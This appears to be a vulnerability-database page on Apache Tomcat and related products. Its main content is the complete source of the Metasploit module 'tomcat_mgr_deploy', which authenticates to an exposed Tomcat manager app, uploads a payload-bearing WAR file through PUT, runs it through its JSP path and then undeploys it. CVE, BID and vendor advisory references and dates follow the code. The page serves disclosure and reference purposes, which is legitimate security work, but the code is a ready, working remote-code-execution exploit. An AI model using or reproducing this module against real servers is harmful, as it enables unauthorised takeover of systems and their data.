vendor:	ibm	model:	http server	scope:	ne	version:	7.0.0.21	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	ne	version:	7.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	ne	version:	2.2.22	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 16317

EXPLOIT

##
# $Id: tomcat_mgr_deploy.rb 11330 2010-12-14 17:26:44Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Manager Application Deployer Authenticated Code Execution',
'Description' => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
containing a jsp application using a PUT request.

The manager application can also be abused using /manager/html/upload, but that
method is not implemented in this module.
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11330 $',
'References' =>
[
# There is no single vulnerability associated with deployment functionality.
# Instead, the focus has been on insecure/blank/hardcoded default passwords.

# The following references refer to HP Operations Manager
[ 'CVE', '2009-3843' ],
[ 'OSVDB', '60317' ],
[ 'CVE', '2009-4189' ],
[ 'OSVDB', '60670' ],

# HP Operations Dashboard
[ 'CVE', '2009-4188' ],

# IBM Cognos Express Default user/pass
[ 'BID', '38084' ],
[ 'CVE', '2010-0557' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179' ],

# IBM Rational Quality Manager and Test Lab Manager
[ 'CVE', '2010-4094' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-214/' ],

# 'admin' password is blank in default Windows installer
[ 'CVE', '2009-3548' ],
[ 'OSVDB', '60176' ],
[ 'BID', '36954' ],

# tomcat docs
[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
#
# detect via /manager/serverinfo
#
[ 'Automatic', { } ],

[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],

#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],

[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 09 2009'))

register_options(
[
OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
# /cognos_express/manager/ for Cognos Express (19300)
OptString.new('PATH', [ true, "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager'])
], self.class)
end

def auto_target
print_status("Attempting to automatically select a target...")

res = query_serverinfo()
return nil if not res

plat = detect_platform(res.body)
arch = detect_arch(res.body)

# No arch or platform found?
if (not arch or not plat)
return nil
end

# see if we have a match
targets.each { |t|
if (t['Platform'] == plat) and (t['Arch'] == arch)
return t
end
}

# no matching target found
return nil
end

def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']

mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
if (not mytarget)
raise RuntimeError, "Unable to automatically select a target"
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
print_status("Using manually select target \"#{mytarget.name}\"")
end

# We must regenerate the payload in case our auto-magic changed something.
p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)

# Generate the WAR containing the EXE containing the payload
jsp_name = rand_text_alphanumeric(4+rand(32-4))
app_base = rand_text_alphanumeric(4+rand(32-4))

# Generate the WAR containing the payload
war = p.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
:arch => mytarget.arch,
:platform => mytarget.platform
}).to_s

query_str = "?path=/" + app_base

#
# UPLOAD
#
path_tmp = datastore['PATH'] + "/deploy" + query_str
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
res = send_request_cgi({
'uri' => path_tmp,
'method' => 'PUT',
'ctype' => 'application/octet-stream',
'data' => war,
}, 20)
if (! res)
raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
end

#
# EXECUTE
#
jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'
print_status("Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
}, 20)

if (! res)
print_error("Execution failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
print_status(res.body) if datastore['VERBOSE']
end

#
# DELETE
#
path_tmp = datastore['PATH'] + "/undeploy" + query_str
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'uri' => path_tmp,
'method' => 'GET'
}, 20)
if (! res)
print_error("WARNING: Undeployment failed on #{path} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("Deletion failed on #{path} [#{res.code} #{res.message}]")
end

handler
end

def query_serverinfo()
path = datastore['PATH'] + '/serverinfo'
res = send_request_raw(
{
'uri' => path
}, 10)

if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
end

print_status(res.body) if datastore['VERBOSE']

return res
end

def detect_platform(body = nil)
if not body
res = query_serverinfo()
return nil if not res
body = res.body
end

body.each_line { |ln|
ln.chomp!

case ln
when /OS Name: /
os = ln.split(':')[1]
case os
when /Windows/
return 'win'

when /Linux/
return 'linux'

end
end
}
end

def detect_arch(body)
body.each_line { |ln|
ln.chomp!

case ln
when /OS Architecture: /
ar = ln.split(':')[1].strip
case ar
when 'x86', 'i386', 'i686'
return ARCH_X86

when 'x86_64', 'amd64'
return ARCH_X86

end
end
}
end

end

Trust: 1.0

sources: EXPLOIT-DB: 16317

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 16317

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 16317

TYPE

Application Deployer (Authenticated) Code Execution (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 16317

CREDITS

Metasploit

Trust: 1.0

sources: EXPLOIT-DB: 16317

EXTERNAL IDS

db:	NVD	id:	CVE-2010-0557	Trust: 1.0
db:	NVD	id:	CVE-2009-3843	Trust: 1.0
db:	NVD	id:	CVE-2009-3548	Trust: 1.0
db:	NVD	id:	CVE-2010-4094	Trust: 1.0
db:	NVD	id:	CVE-2009-4188	Trust: 1.0
db:	NVD	id:	CVE-2009-4189	Trust: 1.0
db:	ZDI	id:	ZDI-10-214	Trust: 1.0
db:	EXPLOIT-DB	id:	16317	Trust: 1.0
db:	NVD	id:	CVE-2012-0053	Trust: 0.8
db:	JUNIPER	id:	JSA10642	Trust: 0.6
db:	JUNIPER	id:	JSA10585	Trust: 0.6
db:	PACKETSTORM	id:	109284	Trust: 0.5
db:	HITACHI	id:	HS12-033	Trust: 0.3
db:	BID	id:	51706	Trust: 0.3
db:	JUNIPER	id:	JSA10658	Trust: 0.3
db:	NVD	id:	CVE-2011-3368	Trust: 0.3
db:	BID	id:	49957	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 16317

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2010-0557	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2009-4189	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2010-4094	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2009-3843	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2009-3548	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2009-4188	Trust: 1.0
url:	http://www.zerodayinitiative.com/advisories/zdi-10-214/	Trust: 1.0
url:	http://support.avaya.com/css/p8/documents/100158872	Trust: 0.6
url:	http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03231301&ac.admitted=1332965374461.876444892.492883150	Trust: 0.6
url:	http://httpd.apache.org/	Trust: 0.6
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10642&cat=sirt_1&actp=list	Trust: 0.6
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10585	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2012-0053	Trust: 0.5
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302	Trust: 0.3
url:	https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03691745	Trust: 0.3
url:	http://httpd.apache.org/security/vulnerabilities_20.html	Trust: 0.3
url:	http://www.sophos.com/en-us/support/knowledgebase/119773.aspx	Trust: 0.3
url:	http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html	Trust: 0.3
url:	http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912	Trust: 0.3
url:	http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041	Trust: 0.3
url:	http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3c20130710124920.2b8793ed.wrowe%40rowe-clan.net%3e	Trust: 0.3
url:	http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities	Trust: 0.3
url:	https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigational	Trust: 0.3
url:	http://www.fujitsu.com/global/support/software/security/products-f/interstage-201203e.html	Trust: 0.3
url:	http://www.xerox.com/download/security/security-bulletin/16aeb-4cd3628b94080/cert_xrx12-009_v1.1.pdf	Trust: 0.3
url:	http://httpd.apache.org/security/vulnerabilities_22.html	Trust: 0.3
url:	http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100157326	Trust: 0.3
url:	http://www.fujitsu.com/global/support/software/security/products-f/interstage-201104e.html	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100151220	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10658&cat=sirt_1&actp=list	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=nas2b7c57b1f1035675186257927003c8d48	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2011/oct/232	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg1pm48384	Trust: 0.3
url:	https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03517954&ac.admitted=1349807398574.876444892.199480143	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg27014506	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html	Trust: 0.3
url:	http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100152144	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 16317

SOURCES

db:	BID	id:	51706
db:	BID	id:	49957
db:	PACKETSTORM	id:	109284
db:	EXPLOIT-DB	id:	16317

LAST UPDATE DATE

2023-05-30T11:42:41.011000+00:00

SOURCES UPDATE DATE

db:	BID	id:	51706	date:	2015-04-13T21:30:00
db:	BID	id:	49957	date:	2015-05-07T17:07:00

SOURCES RELEASE DATE

db:	BID	id:	51706	date:	2012-01-23T00:00:00
db:	BID	id:	49957	date:	2011-10-05T00:00:00
db:	PACKETSTORM	id:	109284	date:	2012-01-31T11:11:11
db:	EXPLOIT-DB	id:	16317	date:	2010-12-14T00:00:00

tag:	Metasploit Framework (MSF)	Trust: 1.0
tag:	exploit	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	protocol	Trust: 0.5
tag:	proof of concept	Trust: 0.5
tag:	info disclosure	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE